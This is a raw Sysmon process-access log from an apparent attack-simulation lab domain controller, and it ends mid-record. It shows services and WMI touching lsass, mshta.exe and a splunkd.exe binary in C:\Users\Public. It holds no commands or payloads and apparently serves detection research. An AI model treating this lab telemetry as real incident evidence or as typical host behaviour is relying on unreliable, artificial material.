|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022140Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.195{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022139Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.195{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022138Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.195{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022641Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.992{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022640Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.992{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-5351-6008-2806-00000000A301}832C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022639Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.992{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5351-6008-2806-00000000A301}832C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022638Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.992{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022637Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.992{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022636Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.992{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022635Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.992{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022634Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.992{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022633Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.992{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022632Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.992{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022631Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.992{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022630Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.992{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022629Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022628Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022627Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022626Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022625Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022624Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022623Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.976{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4